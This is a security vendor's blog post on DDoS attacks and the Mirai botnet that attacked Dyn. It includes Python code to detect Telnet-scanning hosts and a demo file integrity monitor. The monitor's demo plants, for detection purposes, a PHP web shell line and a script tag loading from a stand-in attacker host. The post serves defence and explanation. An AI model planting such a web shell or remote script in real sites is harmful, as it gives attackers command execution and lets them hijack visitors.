Reddit. Twitter. Netflix. Amazon.
These aren't just four of the most popular web services worldwide. All of them suffered downtime in recent weeks because of distributed denial of service (DDoS) attacks.
Wired's Kim Zetter defines DDoS as "an attack that overwhelms a system with data—most commonly a flood of simultaneous requests sent to a website to view its page." These attacks can mean extended downtime for a business, frustrated customers, and lost revenue. Perhaps most worrying, DDoS attacks don't always occur alone. In some cases, criminals use them to "smokescreen" another, more damaging attack, such as data theft. In this blog, you'll learn why DDoS is on the rise and how your organization can keep its endpoints from being used in an attack.
1. The Mirai Attack on Dyn Wasn't the Worst
On October 21, 2016, cloud-based Internet performance management provider Dyn was hit with a massive DDoS attack. The result was hours-long outages for some of the most popular websites and services, including Amazon, Netflix, Twitter, and Reddit.
According to a blog post published by Dyn, it was targeted by "a sophisticated, highly distributed attack involving 10s of millions of IP addresses." The same post, authored by Dyn Chief Strategy Officer Kyle York, also confirmed that devices infected by the Mirai malware were one source of the attack traffic.
While the attack is still under active investigation, it was made possible by the rapidly increasing number of IoT endpoints: security cameras, DVRs, routers, printers, and other connected devices. Mirai does nothing exotic. It scans the Internet for devices that accept Telnet logins, tries a short built-in list of factory-default usernames and passwords, and adds every device it gets into to the botnet. No software vulnerability is required, only a credential that nobody changed.
While this Mirai attack was severe, it's unlikely to be the last DDoS attack of a similar scale. As the number of IoT endpoints grows and many home and business users never change the default credentials, the conditions for the next botnet-driven DDoS attack are already in place.
2. They're Relatively Easy to Launch
In the aftermath of the Dyn attack, a series of hacktivist groups and collectives claimed responsibility for the attack. These claims remain unproven and, in some cases, are viewed with significant doubt by the security community.
However, threat intelligence firm Flashpoint assessed that the attack most likely was not launched by a political or criminal collective. It may instead have originated in a community of "script kiddies," individuals who lack sophisticated technical skills and often launch attacks for fun or notoriety.
Evidence that a DDoS attack of this scale was the work of amateurs points to an uncomfortable truth: in terms of sophistication, DDoS is far simpler to carry out than many other threats, such as advanced persistent threats (APTs). With Mirai's source code public and "booter" services for hire, the attacker needs capacity, not skill.
3. Hacker Motivations Can Vary
While no one truly knows the motivation for the Dyn attack, the evidence suggests that it was neither financially nor politically motivated. Unlike ransomware such as CryptoLocker, which is almost always financially motivated, the reasons behind a DDoS attack vary widely.
Over the past several years, criminal groups have launched DDoS attacks for political reasons, for extortion (pay or the attack continues), and over personal conflicts. In some cases, a DDoS attack is simply revenge against an organization or a public figure.
Because the motivations are so varied, there is no typical "target" for a DDoS attack. Every organization needs to exercise vigilance, regardless of where it falls in terms of political or social controversy.
4. The IoT is Enabling DDoS
Many DDoS attacks rely on a "botnet," a network of computers or other endpoints that have been infected with malware and are directed by a command-and-control (C2) server to flood the target. As IoT adoption soars, the pool of potential recruits for these botnets is growing just as fast.
In November 2015, Gartner predicted that 6.4 billion connected "things" would be in use in 2016 and that the number would reach 20.8 billion by 2020. In both enterprise and personal use, many of these "things" ship with lax security that makes them easy to enlist in a DDoS attack.
In some cases, these security flaws are inherent: a hard-coded password or a Telnet service that cannot be disabled. In many others, IT staff or home users simply never change the default credentials, which makes the devices trivial to log into and infect. PCI DSS Requirement 2 (never use vendor-supplied defaults for passwords or other security parameters) is a sensible baseline here even for devices outside your cardholder environment, and it should be paired with keeping Telnet and other management services off the Internet. Because infected devices scan outward to recruit more bots, a device that has already been compromised is usually visible in your own firewall logs long before it joins an attack.
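Infected devices are easiest to spot by the recruiting behaviour described above: a camera or DVR that suddenly opens connections to dozens of unrelated addresses on TCP/23 and TCP/2323. The following script is an added example, not code from the original post or from Cimcor; it reads firewall connection logs in an assumed "timestamp src dst dport action" format, with the sample lines constructed in the script rather than captured from a real network, and reports internal hosts that contact many distinct destinations on those ports within a short window.

```python
"""Flag internal hosts that scan for Telnet the way a Mirai-infected device does.

Added example (not part of the original post). The log format is an assumption:
one connection per line, "ISO-timestamp src dst dport action". The sample log is
constructed below; it is not real traffic.
"""
from collections import defaultdict
from datetime import datetime, timedelta

TELNET_PORTS = {23, 2323}       # ports Mirai probes for default-credential logins
WINDOW = timedelta(minutes=5)   # look-back window per source host
THRESHOLD = 20                  # distinct destinations in one window; tune per network


def parse_line(line):
    """Parse one assumed-format log line into (timestamp, src, dst, dport, action)."""
    ts, src, dst, dport, action = line.split()
    return datetime.fromisoformat(ts), src, dst, int(dport), action


def find_telnet_scanners(lines, threshold=THRESHOLD, window=WINDOW):
    """Return {src: max_distinct_destinations} for hosts that exceed the threshold.

    A legitimate admin host telnets to the same few switches over and over; a
    scanner touches many different addresses, so we count distinct destinations
    rather than connection attempts.
    """
    events = defaultdict(list)  # src -> [(timestamp, dst)] for Telnet-port connections
    for line in lines:
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        ts, src, dst, dport, _ = parse_line(line)
        if dport in TELNET_PORTS:
            events[src].append((ts, dst))

    suspects = {}
    for src, evs in events.items():
        evs.sort()
        lo = 0
        for hi in range(len(evs)):
            # slide the window so evs[lo:hi+1] spans at most `window`
            while evs[hi][0] - evs[lo][0] > window:
                lo += 1
            distinct = {dst for _, dst in evs[lo:hi + 1]}
            if len(distinct) >= threshold:
                suspects[src] = max(suspects.get(src, 0), len(distinct))
    return suspects


def build_sample_log():
    """Constructed sample log: one infected device, one admin workstation, web traffic."""
    base = datetime(2016, 11, 21, 10, 0, 0)
    lines = []
    # 10.0.5.17 behaves like a Mirai bot: 30 different targets on 23/2323 in 90 seconds
    for i in range(30):
        ts = base + timedelta(seconds=3 * i)
        port = 23 if i % 2 == 0 else 2323
        lines.append(f"{ts.isoformat()} 10.0.5.17 203.0.113.{i + 1} {port} ALLOW")
    # 10.0.5.20 is an admin workstation that keeps telnetting to the same three switches
    for i in range(30):
        ts = base + timedelta(seconds=3 * i)
        lines.append(f"{ts.isoformat()} 10.0.5.20 192.0.2.{(i % 3) + 1} 23 ALLOW")
    # ordinary HTTPS traffic, which the detector ignores entirely
    for i in range(40):
        ts = base + timedelta(seconds=2 * i)
        lines.append(f"{ts.isoformat()} 10.0.5.{30 + i % 5} 198.51.100.{i + 1} 443 ALLOW")
    return lines


SAMPLE_LOG = build_sample_log()

if __name__ == "__main__":
    for host, count in find_telnet_scanners(SAMPLE_LOG).items():
        print(f"{host}: {count} distinct Telnet destinations within {WINDOW}")
```

The distinct-destination count is what separates a bot from an administrator: the workstation above makes as many Telnet connections as the infected device but only ever reaches three hosts, so it is never flagged. A host that does trip the threshold should be pulled off the network, factory-reset, and given a non-default password before it is reconnected.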
5. They Can "Smokescreen" Criminal Activity
In some of the most damaging attacks on record, DDoS is used to obscure other criminal activity that occurs at the same time. While the security team rushes to restore web services to customers, the attackers take advantage of the distraction to gain entry to the network and steal data.
The Guardian reported in 2015 that UK-based telecom company TalkTalk was hit with a DDoS attack that was used to distract the firm's security team while attackers stole customer data. This strategy wasn't unique to TalkTalk and is likely to be used more often in the future. The practical lesson is that an outage is not the time to stop watching your servers: the change you miss during the flood may be the one that matters.
6. They Actually Aren't Your Greatest Threat
The data is clear that the potential for DDoS attacks is rising with the sheer number of unsecured, connected devices. However, that doesn't mean your organization's printers and routers are destined to be recruited into a botnet, or that you must suffer a denial of web service while criminals steal your data.
Chances are high that your devices will be probed by code similar to Mirai, because it scans indiscriminately: any Internet-reachable device that still accepts a default password is a candidate. The smartest way to be prepared is a combination of compliant device security (no default credentials, no management services exposed to the Internet) and technical safeguards that give you oversight of what is changing on your network.
Can File Integrity Monitoring Software Protect Against DDoS Attacks?
Real-time, agent-based file integrity monitoring software can be an important technical safeguard against the intrusions that accompany a DDoS, against APTs, and against a host of other modern threats. By keeping a trusted baseline of the files on your servers, workstations, and network devices and alerting on every deviation from it, you can discover unauthorized changes and compliance issues before they're exploited by cybercriminals.
To be precise about what it does and does not do: file integrity monitoring cannot absorb a flood of traffic, so it does not stop the denial of service itself; that takes capacity and upstream mitigation. It also cannot run on the consumer cameras and DVRs that made up most of the Mirai botnet, which is why default credentials on those devices have to be fixed at the source. What it does is cover the endpoints where an agent can run. If malware alters a binary, a configuration file, or a web page on a monitored host, or if an attacker plants a web shell while your team is busy with the outage, a real-time agent detects the change the moment it happens and can restore the file to its baseline. That is the defense that matters in a smokescreen attack: tools that detect and reverse unauthorized changes in real time, so the flood does not buy the attacker a quiet hour on your servers.
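To make the mechanism concrete, the following is an added example written for this post, not CimTrak's code: a minimal file integrity monitor that takes a baseline (hash and permission bits of every file, plus a stored copy of each file), classifies changes as added, modified, or removed, and restores the baseline. The directory tree, the "attacker" changes, and all file names are constructed in a temporary directory inside the script.

```python
"""Minimal file integrity monitor: baseline, detect, restore.

Added example, not CimTrak's implementation. The monitored tree, the store, and
the tampering in demo() are all constructed in a temporary directory.
"""
import hashlib
import os
import shutil
import tempfile


def sha256_file(path):
    """Stream a file through SHA-256 so large files do not need to fit in memory."""
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(65536), b""):
            h.update(chunk)
    return h.hexdigest()


def scan(root):
    """Return {relative_path: (sha256, permission_bits)} for every regular file under root."""
    result = {}
    for dirpath, _, files in os.walk(root):
        for name in files:
            full = os.path.join(dirpath, name)
            rel = os.path.relpath(full, root)
            result[rel] = (sha256_file(full), os.stat(full).st_mode & 0o7777)
    return result


def take_baseline(root, store):
    """Hash every file and keep a copy of its content in `store` so it can be restored later."""
    baseline = scan(root)
    for rel in baseline:
        dst = os.path.join(store, rel)
        os.makedirs(os.path.dirname(dst), exist_ok=True)
        shutil.copy2(os.path.join(root, rel), dst)
    return baseline


def compare(baseline, current):
    """Classify differences between a trusted baseline and a fresh scan."""
    added = sorted(set(current) - set(baseline))
    removed = sorted(set(baseline) - set(current))
    modified = sorted(p for p in baseline if p in current and current[p] != baseline[p])
    return {"added": added, "removed": removed, "modified": modified}


def restore(root, store, baseline, changes):
    """Reverse unauthorized changes: put back modified/removed files, delete added ones."""
    for rel in changes["modified"] + changes["removed"]:
        dst = os.path.join(root, rel)
        os.makedirs(os.path.dirname(dst), exist_ok=True)
        shutil.copy2(os.path.join(store, rel), dst)
        os.chmod(dst, baseline[rel][1])   # permission bits are part of the baseline too
    for rel in changes["added"]:
        os.remove(os.path.join(root, rel))


def demo():
    """Constructed scenario: baseline a small web root, tamper with it, detect, restore."""
    work = tempfile.mkdtemp()
    root, store = os.path.join(work, "www"), os.path.join(work, "store")
    os.makedirs(os.path.join(root, "cgi-bin"))
    with open(os.path.join(root, "index.html"), "w") as f:
        f.write("<h1>hello</h1>\n")
    with open(os.path.join(root, "cgi-bin", "status.sh"), "w") as f:
        f.write("#!/bin/sh\necho ok\n")
    baseline = take_baseline(root, store)

    # What an intruder might do while the team is busy with the DDoS (constructed, not real):
    # deface a page, drop a web shell, delete a script.
    with open(os.path.join(root, "index.html"), "a") as f:
        f.write("<script src='//evil.example/x.js'></script>\n")
    with open(os.path.join(root, "cgi-bin", "shell.php"), "w") as f:
        f.write("<?php system($_GET['c']); ?>\n")
    os.remove(os.path.join(root, "cgi-bin", "status.sh"))

    detected = compare(baseline, scan(root))
    restore(root, store, baseline, detected)
    after_restore = compare(baseline, scan(root))
    shutil.rmtree(work)
    return detected, after_restore


if __name__ == "__main__":
    detected, after_restore = demo()
    print("detected:", detected)
    print("after restore:", after_restore)
```

Two design points carry over to production tools. The baseline and the stored copies must live somewhere the attacker cannot reach from the monitored host, otherwise the intruder simply re-baselines after tampering. And automatic restoration is only safe for files that are not supposed to change (binaries, web roots, configuration); for log files or databases you want alerting, not reversion.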
To learn more about CimTrak, download our technical summary today.
November 30, 2016